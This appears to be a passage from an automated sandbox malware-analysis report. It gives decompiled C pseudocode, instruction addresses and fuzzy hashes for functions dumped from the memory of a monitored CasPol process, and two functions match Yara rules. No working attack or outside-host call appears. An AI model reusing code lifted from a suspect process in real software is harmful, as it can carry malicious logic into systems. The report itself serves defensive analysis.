                                                                Download Yara Rule
                                                                C-Code - Quality: 97%
                                                                			E016561A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01655E50(0x16067cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E016F9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0162F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                0x016561b3
                                                                0x016561b5
                                                                0x016561bd
                                                                0x016561c3
                                                                0x016561c7
                                                                0x016561d2
                                                                0x016561ff
                                                                0x016561ff
                                                                0x01656201
                                                                0x01656207
                                                                0x01656207
                                                                0x016561d4
                                                                0x016561d9
                                                                0x00000000
                                                                0x00000000
                                                                0x016561df
                                                                0x016561e2
                                                                0x00000000
                                                                0x00000000
                                                                0x016561e6
                                                                0x016561e8
                                                                0x016561ee
                                                                0x016561ee
                                                                0x016561f9
                                                                0x0169762f
                                                                0x01697632
                                                                0x01697635
                                                                0x01697639
                                                                0x01697640
                                                                0x0169766e
                                                                0x01697675
                                                                0x00000000
                                                                0x00000000
                                                                0x01697681
                                                                0x01697689
                                                                0x0169768d
                                                                0x01697691
                                                                0x01697695
                                                                0x01697699
                                                                0x016976af
                                                                0x016976b5
                                                                0x016976b7
                                                                0x016976b7
                                                                0x016976d7
                                                                0x016976dc
                                                                0x00000000
                                                                0x016976dc
                                                                0x016976a2
                                                                0x016976a9
                                                                0x01697651
                                                                0x01697653
                                                                0x01697653
                                                                0x01697656
                                                                0x01697656
                                                                0x00000000
                                                                0x01697656
                                                                0x01697644
                                                                0x01697646
                                                                0x01697648
                                                                0x01697648
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3caa4f6948aa0e5f0d48e5d44af4a257ad89584a9a6afa2268354a4b46d3dea0
                                                                • Instruction ID: 40f2f4a972829a340474d0d6750d4ae035af70b657e6383914f9e512d8b45f55
                                                                • Opcode Fuzzy Hash: 3caa4f6948aa0e5f0d48e5d44af4a257ad89584a9a6afa2268354a4b46d3dea0
                                                                • Instruction Fuzzy Hash: 5C315A716157118FE760CF1DCC40B26BBE9FB88B10F45496DE99997351E770E804CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0162AA16 Relevance: .1, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 95%
                                                                			E0162AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x171d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1717b9c; // 0x0
					_t53 = L01644620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0166B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0166F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01636C59(_t53, _t51, _t58) != 0) {
							_t28 = E01655E50(0x160c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0165B230(_v32, _v28, 0x160c2d8, 1,  &_v24);
								_t28 = E0162F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                0x0162aa25
                                                                0x0162aa29
                                                                0x0162aa2d
                                                                0x0162aa30
                                                                0x0162aa37
                                                                0x0162aa3c
                                                                0x01684458
                                                                0x01684458
                                                                0x01684472
                                                                0x01684474
                                                                0x01684476
                                                                0x0162aa64
                                                                0x0162aa74
                                                                0x0168447c
                                                                0x01684483
                                                                0x01684492
                                                                0x0162aa52
                                                                0x0162aa54
                                                                0x0162aa5e
                                                                0x016844a8
                                                                0x016844ad
                                                                0x016844af
                                                                0x016844b6
                                                                0x016844b6
                                                                0x016844b9
                                                                0x016844bc
                                                                0x016844cd
                                                                0x016844d3
                                                                0x016844d6
                                                                0x016844e1
                                                                0x016844e1
                                                                0x016844e6
                                                                0x016844e8
                                                                0x016844fb
                                                                0x016844fb
                                                                0x016844e8
                                                                0x00000000
                                                                0x0162aa5e
                                                                0x01684476
                                                                0x0162aa42
                                                                0x0162aa46
                                                                0x0162aa48
                                                                0x0162aa4c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7714ba00b28670da9acc14e2cc97570c34e155760dab52690a882eb3c74acfd3
                                                                • Instruction ID: a2c4a4df9ebe6f06b7c3fc202883d2bc0288327c313fda73e8c09c69506efb57
                                                                • Opcode Fuzzy Hash: 7714ba00b28670da9acc14e2cc97570c34e155760dab52690a882eb3c74acfd3
                                                                • Instruction Fuzzy Hash: 5831B171A0062AABCF15AFA8CD81A7FB7B9EF04700F01456DF901E7250EB749A11DBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004206B3 Relevance: .1, Instructions: 93COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004206B3(char* _a4) {
				signed int _t30;
				signed int _t35;
				signed int _t36;
				signed int _t55;
				intOrPtr _t56;
				signed int _t66;
				intOrPtr _t67;
				char* _t68;
				signed int _t78;
				signed int _t80;

				_t68 = _a4;
				if(_t68 != 0) {
					if( *_t68 == 0) {
						_t2 = _t68 + 4; // 0xfffd5885
						_t35 =  *_t2;
						 *_t68 = 1;
						_t56 =  *0x7ffe0018;
						_t67 =  *0x7ffe001c;
						if(_t35 == 0) {
							_t36 =  *0x7ffe0014;
							do {
							} while (_t56 != _t67);
						} else {
							_t80 =  *0x7ffe0014;
							do {
							} while (_t56 != _t67);
							_t36 = _t35 * _t80;
						}
						 *(_t68 + 8) = _t36;
						 *(_t68 + 0xc) = 0x249a;
						 *(_t68 + 0x10) = 0x6eea;
						 *(_t68 + 0x14) = 0x2392;
					}
					_t7 = _t68 + 8; // 0xfc33bff
					_t55 = ( *_t7 << 0x00000012 ^  *_t7 >> 0x00000007) & 0x0007ffff ^  *_t7 << 0x00000012 ^  *_t7 >> 0x0000000d;
					_t8 = _t68 + 0xc; // 0x1c084
					_t66 = ( *_t8 >> 0x00000019 ^  *_t8 * 0x00000004) & 0x0000001f ^  *_t8 >> 0x0000001b ^ _t20 + _t20 + _t20 + _t20;
					_t10 = _t68 + 0x10; // 0xa8e85000
					_t23 =  *_t10;
					_t11 = _t68 + 0x14; // 0x8b000121
					_t78 = ( *_t10 >> 0x00000008 ^  *_t10 << 0x00000007) & 0x000007ff ^  *_t10 >> 0x00000015 ^ _t23 << 0x00000007;
					_t12 = _t68 + 0x14; // 0x8b000121
					_t13 = _t68 + 0x14; // 0x8b000121
					_t30 = ( *_t11 << 0x0000000d ^  *_t11 >> 0x00000009) & 0x000fffff ^  *_t12 >> 0x0000000c ^  *_t13 << 0x0000000d;
					 *(_t68 + 0x14) = _t30;
					 *(_t68 + 0x10) = _t78;
					 *(_t68 + 8) = _t55;
					 *(_t68 + 0xc) = _t66;
					return (_t30 ^ _t78 ^ _t66 ^ _t55) >> 1;
				} else {
					return 0;
				}
			}













                                                                0x004206b7
                                                                0x004206bc
                                                                0x004206c8
                                                                0x004206ca
                                                                0x004206ca
                                                                0x004206cd
                                                                0x004206d0
                                                                0x004206d6
                                                                0x004206de
                                                                0x004206ef
                                                                0x004206f4
                                                                0x004206f4
                                                                0x004206e0
                                                                0x004206e0
                                                                0x004206e6
                                                                0x004206e6
                                                                0x004206ea
                                                                0x004206ea
                                                                0x004206f8
                                                                0x004206fb
                                                                0x00420702
                                                                0x00420709
                                                                0x00420709
                                                                0x00420710
                                                                0x0042072f
                                                                0x00420731
                                                                0x00420750
                                                                0x00420752
                                                                0x00420752
                                                                0x00420771
                                                                0x00420774
                                                                0x00420780
                                                                0x0042078d
                                                                0x00420793
                                                                0x00420795
                                                                0x0042079a
                                                                0x004207a3
                                                                0x004207a6
                                                                0x004207ad
                                                                0x004206be
                                                                0x004206c2
                                                                0x004206c2

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 868f8848cc0017c96682057139142897486ae11c8f30db65a7bbf8e11136fabf
                                                                • Instruction ID: e503b2f001887b4e9d272e8574f2700f8db73224c201d040bcf754bef4412a1e
                                                                • Opcode Fuzzy Hash: 868f8848cc0017c96682057139142897486ae11c8f30db65a7bbf8e11136fabf
                                                                • Instruction Fuzzy Hash: 2C31CE72B006265BD344CE3AD88065AB3E2FBC8350B54863AD919C3B41E778F962CBD0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01664A2C Relevance: .1, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 58%
                                                                			E01664A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x171d360 ^ _t62;
				_v8 =  *0x171d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01642280(_t26, 0x1718608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0163FFB0(_t41, _t51, 0x1718608);
						L2:
						 *0x171b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0166B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01642280(_t28, 0x1718608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0163FFB0(_t42, _t53, 0x1718608);
							if(_t53 != 0) {
								L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0163FFB0(_t41, _t51, 0x1718608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                0x01664a2c
                                                                0x01664a34
                                                                0x01664a3c
                                                                0x01664a3e
                                                                0x01664a48
                                                                0x01664a4b
                                                                0x01664a4d
                                                                0x01664a51
                                                                0x01664a9c
                                                                0x00000000
                                                                0x00000000
                                                                0x01664aa3
                                                                0x01664aa8
                                                                0x01664aad
                                                                0x01664ab1
                                                                0x01664ade
                                                                0x01664ae3
                                                                0x01664a5a
                                                                0x01664a62
                                                                0x01664a6a
                                                                0x01664a6e
                                                                0x0169f203
                                                                0x01664a84
                                                                0x01664a88
                                                                0x01664a89
                                                                0x01664a8a
                                                                0x01664a95
                                                                0x01664a95
                                                                0x01664a79
                                                                0x01664a80
                                                                0x01664af2
                                                                0x01664af4
                                                                0x01664af9
                                                                0x01664aff
                                                                0x01664b01
                                                                0x01664b03
                                                                0x01664b08
                                                                0x0169f20a
                                                                0x0169f212
                                                                0x0169f216
                                                                0x0169f216
                                                                0x01664b08
                                                                0x01664b13
                                                                0x01664b1a
                                                                0x0169f229
                                                                0x0169f229
                                                                0x01664b1a
                                                                0x01664a82
                                                                0x00000000
                                                                0x01664a82
                                                                0x01664ab7
                                                                0x01664acd
                                                                0x01664acd
                                                                0x01664ad5
                                                                0x01664ada
                                                                0x00000000
                                                                0x01664ada
                                                                0x01664ac2
                                                                0x01664acb
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01664acb
                                                                0x01664a53
                                                                0x01664a53
                                                                0x01664a58
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9518f52c601e332cbd85b53c29872464a782b76c9902874ec9a4db0f9995870f
                                                                • Instruction ID: e76905e9fdb8316b46db100e5e99017fd34346e71c4161ba53a3cb3acbd4e2be
                                                                • Opcode Fuzzy Hash: 9518f52c601e332cbd85b53c29872464a782b76c9902874ec9a4db0f9995870f
                                                                • Instruction Fuzzy Hash: F131D132205251ABC7229F58CD44B2AFBA9FBC4B10F05496DED5647259CB70D801CB9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01668EC7 Relevance: .1, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 93%
                                                                			E01668EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x171d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01654E70(0x17186e4, 0x1669490, 0, 0);
					if( *0x17153e8 > 5 && E01668F33(0x17153e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x17153e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x17153e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x160bc46;
						_t48 = E016A7B9C(0x17153e8, 0x160bc46, _t67, 0x17153e8, _t70,  &_v140);
					}
				}
				return E0166B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                0x01668ec7
                                                                0x01668ed9
                                                                0x01668edc
                                                                0x01668ee6
                                                                0x01668ee9
                                                                0x01668eee
                                                                0x01668efc
                                                                0x01668f08
                                                                0x016a1349
                                                                0x016a1353
                                                                0x016a135d
                                                                0x016a1366
                                                                0x016a136f
                                                                0x016a1375
                                                                0x016a137c
                                                                0x016a1385
                                                                0x016a1390
                                                                0x016a1391
                                                                0x016a139c
                                                                0x016a139d
                                                                0x016a13a6
                                                                0x016a13ac
                                                                0x016a13b2
                                                                0x016a13b5
                                                                0x016a13bc
                                                                0x016a13bf
                                                                0x016a13c2
                                                                0x016a13c5
                                                                0x016a13c8
                                                                0x016a13cb
                                                                0x016a13ce
                                                                0x016a13d1
                                                                0x016a13d4
                                                                0x016a13d7
                                                                0x016a13da
                                                                0x016a13dd
                                                                0x016a13e0
                                                                0x016a13e3
                                                                0x016a13e6
                                                                0x016a13e9
                                                                0x016a13f6
                                                                0x016a1400
                                                                0x016a1400
                                                                0x01668f08
                                                                0x01668f32

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2aa06cfe63543b9210bc5d571c5274ba84dde3bd962bf9aab7d45cc7afcd8ada
                                                                • Instruction ID: 59738b5a0e0997cb9713dbecbc002e26329b8d027efbe5f9c650b6df7e48672d
                                                                • Opcode Fuzzy Hash: 2aa06cfe63543b9210bc5d571c5274ba84dde3bd962bf9aab7d45cc7afcd8ada
                                                                • Instruction Fuzzy Hash: C141A2B1D003189FDB24CFAAD980AADFBF9FB48310F5081AEE509A7240E7755A84CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00401B30 Relevance: .1, Instructions: 92COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00401B30(signed int _a4) {
				char* _t19;
				signed int _t27;
				signed int _t33;
				signed int _t51;
				signed int _t52;
				intOrPtr _t60;
				signed int _t67;
				signed int _t75;
				intOrPtr _t81;

				_t19 = _a4;
				if(_t19 != 0) {
					if( *_t19 == 0) {
						_t51 =  *(_t19 + 4);
						 *_t19 = 1;
						_t60 =  *0x7ffe0018;
						_t81 =  *0x7ffe001c;
						if(_t51 == 0) {
							_t52 =  *0x7ffe0014;
							do {
							} while (_t60 != _t81);
						} else {
							do {
							} while (_t60 != _t81);
							_t52 = _t51 *  *0x7ffe0014;
						}
						 *(_t19 + 8) = _t52;
						 *(_t19 + 0xc) = 0x76d0;
						 *(_t19 + 0x10) = 0x4c11;
						 *(_t19 + 0x14) = 0x7f40;
					}
					_t27 = ( *(_t19 + 8) << 0x00000012 ^  *(_t19 + 8) >> 0x00000007) & 0x0007ffff ^  *(_t19 + 8) << 0x00000012 ^ _t53 >> 0x0000000d;
					_t55 =  *(_t19 + 0xc);
					_a4 = _t27;
					 *(_t19 + 8) = _t27;
					_t56 =  *(_t19 + 0x10);
					_t33 = ( *(_t19 + 0xc) >> 0x00000019 ^  *(_t19 + 0xc) * 0x00000004) & 0x0000001f ^ _t55 >> 0x0000001b ^ _t55 * 0x00000004;
					_t67 = ( *(_t19 + 0x10) >> 0x00000008 ^  *(_t19 + 0x10) << 0x00000007) & 0x000007ff ^ _t56 >> 0x00000015 ^ _t56 << 0x00000007;
					_t75 = ( *(_t19 + 0x14) << 0x0000000d ^  *(_t19 + 0x14) >> 0x00000009) & 0x000fffff ^  *(_t19 + 0x14) >> 0x0000000c ^ _t58 << 0x0000000d;
					 *(_t19 + 0x14) = _t75;
					 *(_t19 + 0x10) = _t67;
					 *(_t19 + 0xc) = _t33;
					return (_t75 ^ _t67 ^ _t33 ^ _a4) >> 1;
				} else {
					return _t19;
				}
			}












                                                                0x00401b33
                                                                0x00401b38
                                                                0x00401b42
                                                                0x00401b44
                                                                0x00401b47
                                                                0x00401b4a
                                                                0x00401b50
                                                                0x00401b58
                                                                0x00401b6d
                                                                0x00401b73
                                                                0x00401b73
                                                                0x00401b60
                                                                0x00401b60
                                                                0x00401b60
                                                                0x00401b64
                                                                0x00401b64
                                                                0x00401b77
                                                                0x00401b7a
                                                                0x00401b81
                                                                0x00401b88
                                                                0x00401b88
                                                                0x00401bae
                                                                0x00401bb0
                                                                0x00401bb3
                                                                0x00401bb6
                                                                0x00401bd8
                                                                0x00401bdb
                                                                0x00401bf9
                                                                0x00401c1a
                                                                0x00401c1c
                                                                0x00401c26
                                                                0x00401c2b
                                                                0x00401c34
                                                                0x00401b3b
                                                                0x00401b3b
                                                                0x00401b3b

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1e10294f799e217ca4870a10e36f17fcc428f1fa04ff6ead30c529083e300284
                                                                • Instruction ID: 03c70336a4477be214f950dbac9bbdc3b87b084157193ef14a93f6bd51de86e4
                                                                • Opcode Fuzzy Hash: 1e10294f799e217ca4870a10e36f17fcc428f1fa04ff6ead30c529083e300284
                                                                • Instruction Fuzzy Hash: D931E272B006104FD71CCF55C494A66B7A3ABC8360B1AC2BEDA1A5B3E1CB78AC10C7D4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165E730 Relevance: .1, Instructions: 89COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 74%
                                                                			E0165E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01669670() < 0) {
					L0167DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1717b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01644620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0165E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                0x0165e730
                                                                0x0165e736
                                                                0x0165e738
                                                                0x0165e73d
                                                                0x0165e73e
                                                                0x0165e740
                                                                0x0165e749
                                                                0x0165e765
                                                                0x0165e76a
                                                                0x0165e76b
                                                                0x0165e76c
                                                                0x0165e76d
                                                                0x0165e76e
                                                                0x0165e76f
                                                                0x0165e775
                                                                0x0165e777
                                                                0x0165e77e
                                                                0x0169b675
                                                                0x0165e784
                                                                0x0165e784
                                                                0x0165e789
                                                                0x0165e7a8
                                                                0x0165e7ac
                                                                0x0165e807
                                                                0x0165e7ae
                                                                0x0165e7ae
                                                                0x0165e7b1
                                                                0x0165e7b4
                                                                0x0165e7b9
                                                                0x0165e7c0
                                                                0x0165e7c4
                                                                0x0165e7ca
                                                                0x0165e7cc
                                                                0x00000000
                                                                0x0165e7d3
                                                                0x0165e7d6
                                                                0x00000000
                                                                0x00000000
                                                                0x0165e7ff
                                                                0x0165e802
                                                                0x00000000
                                                                0x00000000
                                                                0x0165e7f9
                                                                0x0165e7fc
                                                                0x00000000
                                                                0x00000000
                                                                0x0165e7f3
                                                                0x0165e7f6
                                                                0x00000000
                                                                0x00000000
                                                                0x0165e7ed
                                                                0x0165e7f0
                                                                0x00000000
                                                                0x00000000
                                                                0x0165e7e7
                                                                0x0165e7ea
                                                                0x00000000
                                                                0x00000000
                                                                0x0169b685
                                                                0x0169b688
                                                                0x00000000
                                                                0x00000000
                                                                0x0169b682
                                                                0x00000000
                                                                0x00000000
                                                                0x0165e7cc
                                                                0x0165e7d9
